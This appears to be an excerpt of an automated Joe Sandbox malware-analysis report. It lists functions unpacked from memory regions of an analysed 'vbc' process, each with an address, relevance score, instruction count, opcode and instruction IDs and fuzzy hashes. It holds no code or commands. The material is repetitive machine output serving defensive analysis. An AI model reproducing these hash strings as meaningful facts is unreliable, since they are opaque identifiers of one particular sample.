                                                                                                                                                                                            • Opcode ID: db32234b3708855e9669e8f6d8ece34e5653b65da0a3b0409ae62709b794aaa6
                                                                                                                                                                                            • Instruction ID: a55daea65c3f287804665e55a3cd21a9aaf6e0f3f08ef27c95c9400c9d3ac1e3
                                                                                                                                                                                            • Opcode Fuzzy Hash: db32234b3708855e9669e8f6d8ece34e5653b65da0a3b0409ae62709b794aaa6
                                                                                                                                                                                            • Instruction Fuzzy Hash: F6130F38905208EFCB169B60D7949D9B732FF5930AB1488AFDC1136B56CB3B9992DF01
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0736F4F8 Relevance: 1.6, Strings: 1, Instructions: 397COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: 7k
                                                                                                                                                                                            • API String ID: 0-1500864370
                                                                                                                                                                                            • Opcode ID: 0f8bd12a57250c71c6118c0fd9a86775c81c544eed519b03a63bddaf4adfb2da
                                                                                                                                                                                            • Instruction ID: f7569ac2b6cc74058de74e1281edb1b412a408775a0a5ed6f2660b680425bfcf
                                                                                                                                                                                            • Opcode Fuzzy Hash: 0f8bd12a57250c71c6118c0fd9a86775c81c544eed519b03a63bddaf4adfb2da
                                                                                                                                                                                            • Instruction Fuzzy Hash: 6DF1AE74B0120ADFDB14DF64E598AADBBB2FF88315F008469E41A9B365DB30EC41CB91
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 09F9D820 Relevance: 1.5, Strings: 1, Instructions: 297COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425977503.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9f90000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: ci
                                                                                                                                                                                            • API String ID: 0-2660201732
                                                                                                                                                                                            • Opcode ID: cab0bfdfdb4be38218705f2147fb2a02bfb4eb4a268c9dc6aa65de3439c4354b
                                                                                                                                                                                            • Instruction ID: 4ea721672e1b969747a91e3b54f1ec4dc50bb4a49a24bb4703add2f8aebd4b22
                                                                                                                                                                                            • Opcode Fuzzy Hash: cab0bfdfdb4be38218705f2147fb2a02bfb4eb4a268c9dc6aa65de3439c4354b
                                                                                                                                                                                            • Instruction Fuzzy Hash: E9D1C274E012288FDB64DF74C994B9DBBB2BF89304F2095AAD409AB391DB345E85CF50
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 09EF1AF8 Relevance: 1.4, Instructions: 1447COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425408932.0000000009EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EF0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9ef0000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 03be4de496d23470baf655bd92240be42f846032e8e7173d6f416f8ea262c8a5
                                                                                                                                                                                            • Instruction ID: 74387e4bdd6fb88e2b0647687876dbc57a5f370c29118940551cb381a72793f4
                                                                                                                                                                                            • Opcode Fuzzy Hash: 03be4de496d23470baf655bd92240be42f846032e8e7173d6f416f8ea262c8a5
                                                                                                                                                                                            • Instruction Fuzzy Hash: CAC29E74B001189FDB14DF64C895EEDBBB6EF88704F1080AAE61A9B7A1CB319D85CF51
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0736E998 Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: 7k
                                                                                                                                                                                            • API String ID: 0-1500864370
                                                                                                                                                                                            • Opcode ID: 0cf51ac2517f9904d0614ec0eafffbaaf438559b63554a7e1512321b702df492
                                                                                                                                                                                            • Instruction ID: 4893158cde91882f42a7b44058ba13595d656e3c3f21eccde7487aff66237611
                                                                                                                                                                                            • Opcode Fuzzy Hash: 0cf51ac2517f9904d0614ec0eafffbaaf438559b63554a7e1512321b702df492
                                                                                                                                                                                            • Instruction Fuzzy Hash: 757149B5E103098FDB14DFA8C4586AEB7F2BF89344F24852AE409AB355DB749C46CB81
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0736F4EC Relevance: 1.4, Strings: 1, Instructions: 187COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: 7k
                                                                                                                                                                                            • API String ID: 0-1500864370
                                                                                                                                                                                            • Opcode ID: e7650bf57310c2a3b94c42c65f3d66dcea90f9e536a7a5cde07db6da70f614c3
                                                                                                                                                                                            • Instruction ID: b62843d122dd3ee3c65f51a82b1753cfdce6ea2728642612c18316d31dcdf8b9
                                                                                                                                                                                            • Opcode Fuzzy Hash: e7650bf57310c2a3b94c42c65f3d66dcea90f9e536a7a5cde07db6da70f614c3
                                                                                                                                                                                            • Instruction Fuzzy Hash: 34811D74A0120ADFDB04DF68D59899DBBB2FF88311F148558E81AAB365DB34EC41CF91
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 07366080 Relevance: 1.3, Strings: 1, Instructions: 87COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: _;
                                                                                                                                                                                            • API String ID: 0-1153873593
                                                                                                                                                                                            • Opcode ID: 42ee58ab127d240227360a58b993bd16ca6b8e07724194fa5b9ec15b4b3ec9b8
                                                                                                                                                                                            • Instruction ID: f284120d477d1c8cf8f95dca56b3384cd83541251614ff5cd339828d7134d645
                                                                                                                                                                                            • Opcode Fuzzy Hash: 42ee58ab127d240227360a58b993bd16ca6b8e07724194fa5b9ec15b4b3ec9b8
                                                                                                                                                                                            • Instruction Fuzzy Hash: F941113590021DAFCF019FA0E988DACBBB6FB48301B4084A9FA11AB663DB765D55DF50
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 07365318 Relevance: 1.3, Strings: 1, Instructions: 42COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: 8cbg
                                                                                                                                                                                            • API String ID: 0-3663169525
                                                                                                                                                                                            • Opcode ID: 9b047b3128c65ae636fa2c9dd5ae34a3014356160fc78f709a2a24fc755d3880
                                                                                                                                                                                            • Instruction ID: 0f9d7d1088f46e5a899887991b6c25b35bf12c38a4d2a84640f5cf1c27c9c1ac
                                                                                                                                                                                            • Opcode Fuzzy Hash: 9b047b3128c65ae636fa2c9dd5ae34a3014356160fc78f709a2a24fc755d3880
                                                                                                                                                                                            • Instruction Fuzzy Hash: EC0192302047088BD750AF75E14CA5A77E3EFC831AB104D39D14A87B41DF74AC4A8BD1
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 09F96211 Relevance: 1.3, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425977503.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9f90000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: 7k
                                                                                                                                                                                            • API String ID: 0-1500864370
                                                                                                                                                                                            • Opcode ID: 20d56a761ddfbc2f1f4d2aef4916f018755c5342ca8775c5036a55d6a17f05df
                                                                                                                                                                                            • Instruction ID: fb8ab13fe18f932087a8f245202649d63dcca24e54ba0bf3c8b6e5cc070bb0c4
                                                                                                                                                                                            • Opcode Fuzzy Hash: 20d56a761ddfbc2f1f4d2aef4916f018755c5342ca8775c5036a55d6a17f05df
                                                                                                                                                                                            • Instruction Fuzzy Hash: 50F046303000814FCB11ABADA5D49F93B92DFCB21170444AFE045CB742DF319C058760
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 07367758 Relevance: 1.3, Strings: 1, Instructions: 15COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: i;
                                                                                                                                                                                            • API String ID: 0-1679830939
                                                                                                                                                                                            • Opcode ID: 7b3dbecacf95f498f339d7370e68d5c44dc177b7b2e59e0bf988f029592b2189
                                                                                                                                                                                            • Instruction ID: 7b34e671f128930792b45c2ab42cde6e2ce7a5f7e798e502f25320b9586e78ff
                                                                                                                                                                                            • Opcode Fuzzy Hash: 7b3dbecacf95f498f339d7370e68d5c44dc177b7b2e59e0bf988f029592b2189
                                                                                                                                                                                            • Instruction Fuzzy Hash: 6BD05E32268288DFC7029F68C814C007F76BF4B61030440D9F6808F273C375A920DB15
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 09EF0048 Relevance: .7, Instructions: 674COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425408932.0000000009EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EF0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9ef0000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 3eee9ff7491f8e2035a69071a5549e8fe0c18c729b8bc494f1eda0d958df99c9
                                                                                                                                                                                            • Instruction ID: 547e6a836364d8fe59fb3cde6c8a7e5c69b50b3b582369addfee4ae38a7cb0f6
                                                                                                                                                                                            • Opcode Fuzzy Hash: 3eee9ff7491f8e2035a69071a5549e8fe0c18c729b8bc494f1eda0d958df99c9
                                                                                                                                                                                            • Instruction Fuzzy Hash: 2042AF753006188FCB249B74C5A09AE76B2EFC660AF014C5DD2079FB91CB79EC198BD6
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 09EF1FC8 Relevance: .6, Instructions: 572COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425408932.0000000009EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EF0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9ef0000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 978121715274616db7d5ec1b9cf93a7a512d0ce958d986ae8dd30ff02802c870
                                                                                                                                                                                            • Instruction ID: 834396cbb2606569487db926aaa59a8546a622758fec0bd7e43dd8823251f328
                                                                                                                                                                                            • Opcode Fuzzy Hash: 978121715274616db7d5ec1b9cf93a7a512d0ce958d986ae8dd30ff02802c870
                                                                                                                                                                                            • Instruction Fuzzy Hash: 5D22B478B001188FDB249B24C965EED77B2EF88708F108096EB1A5B795CB71ED81CF95
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0A00F7D3 Relevance: .4, Instructions: 353COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.426687603.000000000A000000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A000000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a000000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: d097c6dcffd62567f6ddfb5f55202d40428cee0089b30b6af2bfbacd6c4f0dca
                                                                                                                                                                                            • Instruction ID: 0e0024fe8be3bcd8070f240be20b7f45726f13375aaf09668a20aaa7a58923af
                                                                                                                                                                                            • Opcode Fuzzy Hash: d097c6dcffd62567f6ddfb5f55202d40428cee0089b30b6af2bfbacd6c4f0dca
                                                                                                                                                                                            • Instruction Fuzzy Hash: C9E12830A00209DFEB64DFA4D198AADB7F2EF45305F148869E4169F3A1DB74AC86CF40
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 09F9ABE8 Relevance: .3, Instructions: 308COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425977503.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9f90000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 1808b52c237c472c8399c5b0efd3c7eb0894a2237f271e09370af3d6b9d3b7fc
                                                                                                                                                                                            • Instruction ID: 275ef4351e70ab6a122a5063ec18851472e1b38b82e5e933d6fef4dc4b9d7400
                                                                                                                                                                                            • Opcode Fuzzy Hash: 1808b52c237c472c8399c5b0efd3c7eb0894a2237f271e09370af3d6b9d3b7fc
                                                                                                                                                                                            • Instruction Fuzzy Hash: 85E1C474E01218CFDB14DFA5C584A9DFBB2FF48304F2482AAD819AB355D735A985CF50
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 09EF06BA Relevance: .3, Instructions: 305COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425408932.0000000009EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EF0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9ef0000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: b27fcf3bf8fc03352e18ca117718eb8f314abf2f132acf7c7691c1d4e8617634
                                                                                                                                                                                            • Instruction ID: 895ef2cd0ab1c7577e7bc42d8c91f31d7fb9883ba6a126c749e270e79f7d979d
                                                                                                                                                                                            • Opcode Fuzzy Hash: b27fcf3bf8fc03352e18ca117718eb8f314abf2f132acf7c7691c1d4e8617634
                                                                                                                                                                                            • Instruction Fuzzy Hash: 49B1BF78700204DFEB149B64C9A5F7937A6EB8870AF11506AE6068F7E2CBB5DC50CB91
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 09EF05CC Relevance: .3, Instructions: 305COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425408932.0000000009EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EF0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9ef0000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: c4d004526fa13b61f4ed872092540417872ad5b1e8447f470e4d10123f7f255b
                                                                                                                                                                                            • Instruction ID: ffdecf58530ce233523e28cbc167b7dbe0e40618c468af0aec32d1eab0262e07
                                                                                                                                                                                            • Opcode Fuzzy Hash: c4d004526fa13b61f4ed872092540417872ad5b1e8447f470e4d10123f7f255b
                                                                                                                                                                                            • Instruction Fuzzy Hash: A6B1CE78700204DFEB149B64C9A4F7937A6EB8870AF11506AE7068F7E2CBB5DC50CB91
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 09EF0643 Relevance: .3, Instructions: 305COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425408932.0000000009EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EF0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9ef0000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: a4e2ca986637b3f23b05aa85c974e06ed811955bd4c4a448a7784bdb878320eb
                                                                                                                                                                                            • Instruction ID: eac5e39a6751ed5a51746fd2653d5b0e5d3174defc3ea2561dc8ac3a9a7c097b
                                                                                                                                                                                            • Opcode Fuzzy Hash: a4e2ca986637b3f23b05aa85c974e06ed811955bd4c4a448a7784bdb878320eb
                                                                                                                                                                                            • Instruction Fuzzy Hash: 53B1BE78700204DFEB149B64C9A5F7937A6EB8870AF11506AE7068F7E2CBB5DC50CB91
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 09EF0555 Relevance: .3, Instructions: 303COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425408932.0000000009EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EF0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9ef0000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: fd12f3f67f0ede642e5216f7cbf24de14aea234542761f9055db937b2e977072
                                                                                                                                                                                            • Instruction ID: 3d1481b8d24b6d9424ab6ba99f2983a30d49741b47a52c29206fa37625115b67
                                                                                                                                                                                            • Opcode Fuzzy Hash: fd12f3f67f0ede642e5216f7cbf24de14aea234542761f9055db937b2e977072
                                                                                                                                                                                            • Instruction Fuzzy Hash: 8DB1BF78700204DFEB149B64C9A5F7937A6EB8870AF11506AE6068F7E2CBB5DC50CB91
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 09F97AF8 Relevance: .3, Instructions: 295COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425977503.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9f90000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: d780141179779331b3a5c410cf52bc335554c41c88ceb1e6270950e57bd1018b
                                                                                                                                                                                            • Instruction ID: 1c4260c52dcee4adfacead820226189850942f22ac92a6c6f881ef67ff659115
                                                                                                                                                                                            • Opcode Fuzzy Hash: d780141179779331b3a5c410cf52bc335554c41c88ceb1e6270950e57bd1018b
                                                                                                                                                                                            • Instruction Fuzzy Hash: 05A11171B242159BEF14ABB5C95177E73E6AF85244F0484BAE906EB381EF39DC02C361
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0A00F600 Relevance: .2, Instructions: 232COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.426687603.000000000A000000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A000000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a000000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 4a07bcd1d0a8af67639cb7fa6fd8bd791e7ab8b6286bae47855fca34372ace2b
                                                                                                                                                                                            • Instruction ID: a4fa737433cd8cac527ea080dec9eb5917c78859959409bd3b7c0b71259d6374
                                                                                                                                                                                            • Opcode Fuzzy Hash: 4a07bcd1d0a8af67639cb7fa6fd8bd791e7ab8b6286bae47855fca34372ace2b
                                                                                                                                                                                            • Instruction Fuzzy Hash: F7917D70A0020DDFEB64DFA8D498EADBBF6AF48300F14446AE406EB391DB749846CB51
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 07367870 Relevance: .2, Instructions: 224COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: c3fff153594d3a9c05a5d6977c8a640fb2793f55f4139c54fda887fdab01eef5
                                                                                                                                                                                            • Instruction ID: 26763698541ae9a17717f0c79b6d905a5adba5b3f538a8914ecc92f11739e61d
                                                                                                                                                                                            • Opcode Fuzzy Hash: c3fff153594d3a9c05a5d6977c8a640fb2793f55f4139c54fda887fdab01eef5
                                                                                                                                                                                            • Instruction Fuzzy Hash: 2D8117B5B042009FEB009B74D4189AE7BB2EF96244F94C46AE84ADB381DB34DD06CB91
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0A00E48C Relevance: .2, Instructions: 209COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.426687603.000000000A000000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A000000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a000000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 5c39bc9e84dd7eb5693cd3896a8191196ddec869c9e37c9950e119f4f8a52957
                                                                                                                                                                                            • Instruction ID: fa2473f404c1de63fccd2e017c7568fdfe5d897e5a7a55db4e47cc4e1e3aafed
                                                                                                                                                                                            • Opcode Fuzzy Hash: 5c39bc9e84dd7eb5693cd3896a8191196ddec869c9e37c9950e119f4f8a52957
                                                                                                                                                                                            • Instruction Fuzzy Hash: 9461F534B043445FDB199B749858A6EBBE3AFC6244F14886AE406DB3C2DF34DD46CB91
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0736E780 Relevance: .2, Instructions: 153COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: ae2a01f44ddaf6a806970cb3ac20226994070cd5d475f0e29df84d9e9e949c83
                                                                                                                                                                                            • Instruction ID: d1003ba3db299dffccf1a7e2a2be5a068b03c4b7c55133606855db187043eb92
                                                                                                                                                                                            • Opcode Fuzzy Hash: ae2a01f44ddaf6a806970cb3ac20226994070cd5d475f0e29df84d9e9e949c83
                                                                                                                                                                                            • Instruction Fuzzy Hash: 62514B74E0121DEFDF14DFA4E8989EDBBB6BF88304F108029E816A7364DB349945CB51
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 09F98F18 Relevance: .2, Instructions: 152COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425977503.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9f90000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: fcb3cfccefbf00d804a4b8db68d6fdaaf08b16c73e0ed8ca28c958c3de15050a
                                                                                                                                                                                            • Instruction ID: 30b09a973d9ad37a5326610100c02d0d49a4ed745d3cfcbe3dab6ad26f6d41a8
                                                                                                                                                                                            • Opcode Fuzzy Hash: fcb3cfccefbf00d804a4b8db68d6fdaaf08b16c73e0ed8ca28c958c3de15050a
                                                                                                                                                                                            • Instruction Fuzzy Hash: 1A519135B102089FEB04CF79C981BAEBBE6AF8C344F159079E915DB360EA75DC418B50
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0A00FDC8 Relevance: .1, Instructions: 149COMMON
                                                                                                                                                                                            Download Yara Rule
